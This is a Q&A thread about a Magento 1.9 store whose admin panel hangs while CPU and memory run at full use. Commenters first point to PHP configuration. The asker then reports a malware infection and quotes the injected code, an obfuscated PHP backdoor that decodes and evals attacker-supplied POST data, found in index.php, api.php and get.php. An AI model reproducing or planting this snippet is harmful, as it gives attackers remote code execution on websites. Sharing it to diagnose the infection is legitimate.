# Magento admin not working - keeps loading for all actions

Tags: magento, magento-1.9

i am new to magento platform, i have developed a store in 1.9.1.0 which is having 700 products store works perfect for 2 months and now suddenly admin not working, if tries to search product or any thing gives loading image and no result at the end whereas same store works on localhost perfectly. in cpanel physical memory shows full consumption as well as CPU uses also shows full.

Comment: Check your php.ini configuration values and then restart Apache. Clear your magento cache and session too. If still not working then uncomment display_errors in index.php and check error(for ajax request and page load)

Comment: Thanks for the reply i will try and let you know the result can you please suggest me the best php.ini configuration values

Comment: Please check error first like if memory limit error is there then increase memory size in php.ini. Configuration differs according to need.

Comment: Thanks for the reply i got the solution it was malware attack some code like $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n828e00'])) {eval($s21(${$s20}['n828e00']));}  is added in my index.php,api.php,get.php and some aditional files are also created.

Comment: Good buddy. Thank you for sharing solution.